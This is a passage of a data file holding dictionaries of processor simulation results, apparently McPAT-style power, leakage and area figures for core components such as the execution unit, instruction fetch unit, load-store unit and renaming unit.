'Execution Unit/Integer ALUs/Runtime Dynamic': 0.385727,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.19487,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0806818,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0127789,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.122051,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0945075,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.202732,
'Execution Unit/Register Files/Runtime Dynamic': 0.107286,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.316606,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.796848,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.41199,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00182918,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00182918,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00159979,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000622896,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00135761,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00661576,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0173034,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0908525,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.779,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.219694,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.308576,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.28227,
'Instruction Fetch Unit/Runtime Dynamic': 0.643042,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0541553,
'L2/Runtime Dynamic': 0.0114114,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 5.01726,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.81622,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.122297,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.122297,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.59713,
'Load Store Unit/Runtime Dynamic': 2.54164,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.301563,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.603125,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.107026,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.107838,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.359317,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.036005,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.702842,
'Memory Management Unit/Runtime Dynamic': 0.143843,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 25.393,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.28148,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0214127,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.179184,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.482076,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 7.23401,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0758444,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.26226,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.409911,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.484359,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.337593,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.58459,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.385514,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.3077,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.270852,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.373508,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.13883,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0774411,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.012238,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.116878,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0905077,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.194319,
'Execution Unit/Register Files/Runtime Dynamic': 0.102746,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.303204,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.763138,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.29371,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00176219,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00176219,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00154193,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000600772,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00130015,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00636647,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0166433,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0870074,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.53441,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.211193,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.295516,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.02563,
'Instruction Fetch Unit/Runtime Dynamic': 0.616727,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0455747,
'L2/Runtime Dynamic': 0.00960554,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.85698,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.73924,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.117111,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.117111,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.41226,
'Load Store Unit/Runtime Dynamic': 2.4339,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.288776,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.577552,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.102488,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.103171,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.344109,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0346112,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.679789,
'Memory Management Unit/Runtime Dynamic': 0.137783,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.8638,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.270174,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0205137,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.171554,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.462241,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 6.95397,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0742602,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.261016,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.401838,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.480808,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.330139,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.571682,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.377117,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.27894,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.264722,
